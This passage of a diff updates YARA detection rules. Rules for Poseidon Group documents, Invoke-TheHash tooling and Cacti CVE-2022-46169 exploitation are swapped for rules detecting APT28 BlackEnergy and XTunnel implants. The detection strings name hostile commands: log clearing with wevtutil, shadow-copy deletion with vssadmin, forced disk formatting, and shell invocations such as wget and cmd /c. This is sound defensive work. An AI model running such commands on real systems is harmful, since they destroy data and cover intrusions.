-		logic_hash = "0d8c255f56bb33b6a720c98727127c07a2d77245b18da381706a40339bebd20b"
-		score = 80
+		logic_hash = "27ae70d384488660c1f80040503d3eb6541112fd6332edc5820bc6718d76b847"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "c:\\cmd32dll.exe" fullword ascii
+		$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
+		$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
+		$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
+		$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
+		$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
+		$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
+		$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
+		$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 3 of them
 }
-rule SIGNATURE_BASE_Poseidongroup_Maldoc_2 : FILE
+
+rule SIGNATURE_BASE_IMPLANT_4_V8
 {
 	meta:
-		description = "Detects Poseidon Group - Malicious Word Document"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9fc0f25e-809d-5803-be39-740ce3a3c85a"
-		date = "2016-02-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L66-L89"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "1e82d105-8dda-55c9-aec0-8f9f02c3a94e"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L883-L911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c35077a4980336a2c50cade322861dc02f92f7617115420eebe7c882c2f620b"
-		score = 70
+		logic_hash = "dd072702c59822587d7ede0bc59c5672fbaa9a05595940781554fadb32e109f7"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
-		hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
-		hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
-		hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
-		hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
-		hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
+		tags = ""
 
 	strings:
-		$s0 = "{\\*\\generator Msftedit 5.41." ascii
-		$s1 = "Attachment 1: Complete Professional Background" ascii
-		$s2 = "E-mail:  \\cf1\\ul\\f1"
-		$s3 = "Education:\\par" ascii
-		$s5 = "@gmail.com" ascii
+		$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4
+         33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B
+         DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D
+         3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50
+         68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9
+         7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF
+         57 18}
+		$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08
+         2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00
+         8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8
+         89 45 F8 8B 4D EC 83 C1 08 89 4D FC}
+		$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF
+         66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66
+         8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00
+         F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
+         65 6C 54 FF 57}
+		$a1 = {83 EC 04 60 E9 1E 01 00 00}
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 500KB and 3 of them
+		$a1 at pe.entry_point or any of ( $f* )
 }
-rule SIGNATURE_BASE_HKTL_EXPL_WIN_PS1_Badsuccessor_May25 : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V9
 {
 	meta:
-		description = "Detects PowerShell tool called Get-BadSuccessorOUPermissions.ps1 that helps exploit a vulnerability in Active Directory. Lists every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions."
-		author = "Florian Roth"
-		id = "5bc135f2-dc7f-51e9-ba19-b63af64f0deb"
-		date = "2025-05-22"
-		modified = "2025-05-22"
-		reference = "https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_badsuccessor_helper_may25.yar#L2-L15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "a404212a-d9ef-54c1-bbf8-a213ec094f18"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L913-L933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a023bced4aec2b2c601088367766f42a3fcf36053c7eb92985cc7468c7cd6cb0"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "c0e48bf0839965f9bda9cc475aba5b4934c27c426a8fa4423fb24aa9d792e2e4"
+		score = 85
+		quality = 77
+		tags = ""
 
 	strings:
-		$x1 = "function Get-BadSuccessorOUPermissions" ascii wide
-		$x2 = "\"0feb936f-47b3-49f2-9386-1dedc2c23765\"=\"msDS-DelegatedManagedServiceAccount\"" ascii wide
-		$x3 = "CreateChild|GenericAll|WriteDACL|WriteOwner" ascii wide
+		$a = "wevtutil clear-log" ascii wide nocase
+		$b = "vssadmin delete shadows" ascii wide nocase
+		$c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
+		$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
+		$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52
+         50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89
+         44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ??
+         ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
+		$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
 
 	condition:
-		filesize < 20MB and 1 of them
+		($a and $b ) or $c or $d or ( $openPhysicalDiskOverwriteWithZeros and $f )
 }
-rule SIGNATURE_BASE_Invoke_Smbexec : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V10 : FILE
 {
 	meta:
-		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
-		author = "Florian Roth (Nextron Systems)"
-		id = "07c742f4-3039-5c84-81d4-73ad25b98681"
-		date = "2017-06-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L12-L30"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "75c266ca-a27f-5ffe-a438-c35bbacfa70c"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L935-L966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc9feb7d4eadfc470aabf18d82c884f454ebcdd37f3ca6b0ee4b3634cd9e33ae"
-		score = 75
-		quality = 85
+		logic_hash = "f22fd45eb77ff1a8202f4bd0d0c43787c8184300e96aff021e13371ae7bd5553"
+		score = 85
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
 
 	strings:
-		$x1 = "Invoke-SMBExec -Target" fullword ascii
-		$x2 = "$packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID" fullword ascii
-		$s1 = "Write-Output \"Command executed with service $SMB_service on $Target\"" fullword ascii
-		$s2 = "$packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00" fullword ascii
-		$s3 = "$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \\svcctl" fullword ascii
+		$ = {A1B05C72}
+		$ = {EB3D0384}
+		$ = {6F45594E}
+		$ = {71815A4E}
+		$ = {D5B03E72}
+		$ = {6B43594E}
+		$ = {F572993D}
+		$ = {665D9DC0}
+		$ = {0BE7A75A}
+		$ = {F37443C5}
+		$ = {A2A474BB}
+		$ = {97DEEC67}
+		$ = {7E0CB078}
+		$ = {9C9678BF}
+		$ = {4A37A149}
+		$ = {8667416B}
+		$ = {0A375BA4}
+		$ = {DC505A8D}
+		$ = {02F1F808}
+		$ = {2C819712}
 
 	condition:
-		( filesize < 400KB and 1 of them )
+		uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 and 15 of them
 }
-rule SIGNATURE_BASE_Invoke_Wmiexec_Gen_1
+rule SIGNATURE_BASE_IMPLANT_4_V11 : FILE
 {
 	meta:
-		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
-		date = "2017-06-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L32-L51"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "e5fb0843-20f7-56a0-8eea-0db7cef7f610"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L968-L985"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12aeba5255527a337c49f1c4d1dc506a13ea02da69a8fc509c77bcb07c2135c8"
-		score = 75
+		logic_hash = "7bdeddc4334ed6557175b5eefc78d69283d6c91f98970bd0cfe6365b3ab477f4"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97"
-		hash2 = "7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07"
+		tags = "FILE"
 
 	strings:
-		$x1 = "Invoke-WMIExec " ascii
-		$x2 = "$target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))" fullword ascii
-		$s1 = "Import-Module $PWD\\Invoke-TheHash.ps1" fullword ascii
-		$s2 = "Import-Module $PWD\\Invoke-SMBClient.ps1" fullword ascii
-		$s3 = "$target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList" fullword ascii
-		$x4 = "Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0" ascii
+		$ = "/c format %c: /Y /X /FS:NTFS"
+		$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
+		$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
+		$ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
+		$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 2 of them
 }
-rule SIGNATURE_BASE_Invoke_Smbexec_Invoke_Wmiexec_1
+rule SIGNATURE_BASE_IMPLANT_4_V13 : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd1c6599-028d-5535-beb8-5b2658481b97"
-		date = "2017-06-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L53-L70"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "e96a7d9f-1840-542f-9a9b-95e74377f234"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1011-L1032"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "feb2973cd7e2c221cd91ec543f1d943cf1b5d5d18fe74c8f7e58341f76f95b51"
-		score = 75
+		logic_hash = "576c07c44105d2a38ca715d366f68058b2b3118f25e91d2d3e2d20e932fc9453"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
-		hash2 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
+		tags = "FILE"
 
 	strings:
-		$s1 = "$process_ID = $process_ID -replace \"-00-00\",\"\"" fullword ascii
-		$s2 = "Write-Output \"$Target did not respond\"" fullword ascii
-		$s3 = "[Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)" fullword ascii
+		$XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
+		$XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
+		$XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00
+         66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0
+         78 2?}
+		$EXP1 = "DispatchCommand"
+		$EXP2 = "DispatchEvent"
+		$BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D
+         C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Invoke_Wmiexec_Gen
+rule SIGNATURE_BASE_IMPLANT_5_V1
 {
 	meta:
-		description = "Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
-		date = "2017-06-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L72-L90"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "dee08753-3465-5bf2-acd5-aa6cc80aba3c"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1034-L1051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1ee79b7ea576adb71bde903756cda7af22e55eee9c4c3964cc9edc8930083fa2"
-		score = 75
+		logic_hash = "d94192d408036bf02052dc5145b78fea61323810b2abdbba64c65e1f6387ea42"
+		score = 85
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01"
-		hash2 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
-		hash3 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$s1 = "$NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)" fullword ascii
-		$s2 = "$client_challenge = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})" fullword ascii
-		$s3 = "$NTLM_hash_bytes = $NTLM_hash_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}" fullword ascii
+		$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00
+         70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00}
+		$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
+		$TPSMSG1 = "error 2004 send to TPS - %d\x0a"
+		$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
+		$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
 
 	condition:
-		all of them
+		any of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Cacti_Commandinjection_CVE_2022_46169_Dec22_1 : CVE_2022_46169
+rule SIGNATURE_BASE_IMPLANT_5_V2
 {
 	meta:
-		description = "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169"
-		author = "Nasreddine Bencherchali"
-		id = "c799a419-87ed-55ea-8ebb-d4da901be4ad"
-		date = "2022-12-27"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2022_46169_cacti.yar#L1-L13"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "40f60306-41ee-5a18-84e2-cf479a6bc849"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1053-L1192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ccd3b830deb5c5d65519274c4c528203a2a14a177382334da87e288174e2cfe"
-		score = 70
+		logic_hash = "43e3df19ecd2068636b92c7a5c0399b22f8fa478e3e1562f392e78c5a268a1e5"
+		score = 85
 		quality = 60
-		tags = "CVE-2022-46169"
-
-	strings:
-		$xr1 = /\/remote_agent\.php.{1,300}(whoami|\/bin\/bash|\/bin\/sh|\bwget\b|powershell|cmd \/c|cmd\.exe \/c).{1,300} 200 / ascii
-
-	condition:
-		$xr1
-}
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_03_Clientuploader_Dec21 : FILE
-{
-	meta:
-		description = "Detects ClientUploader onedrv"
-		author = "CISA Code & Media Analysis"
-		id = "4eeadb28-9312-5602-932a-36acb48772f4"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L4-L23"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76f552b2416ae2426b73a321485f34a611c2a3c1ca35791bc9f1834072dc28be"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		hash1 = "84164e1e8074c2565d3cd178babd93694ce54811641a77ffdc8d1084dd468afb"
+		tags = ""
 
 	strings:
-		$s1 = "Decoder2"
-		$s2 = "ClientUploader"
-		$s3 = "AppDomain"
-		$s4 = { 5F 49 73 52 65 70 47 ?? 44 65 63 6F 64 65 72 73 }
-		$s5 = "LzmaDecoder"
-		$s6 = "$ee1b3f3b-b13c-432e-a461-e52d273896a7"
+		$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
+		$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
+		$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
+		$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
+		$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
+		$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 }
+		$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }
+		$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE }
+		$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A }
+		$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB }
+		$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }
+		$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
+		$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
+		$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
+		$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
+		$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
+		$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
+		$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
+		$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
+		$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
+		$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 }
+		$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 }
+		$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 }
+		$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 }
+		$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 }
+		$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC }
+		$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB }
+		$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB }
+		$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 }
+		$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 }
+		$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B }
+		$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 }
+		$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 }
+		$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 }
+		$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
+		$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
+		$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
+		$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
+		$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
+		$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
+		$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
+		$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
+		$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
+		$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
+		$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
+		$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
+		$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
+		$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
+		$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
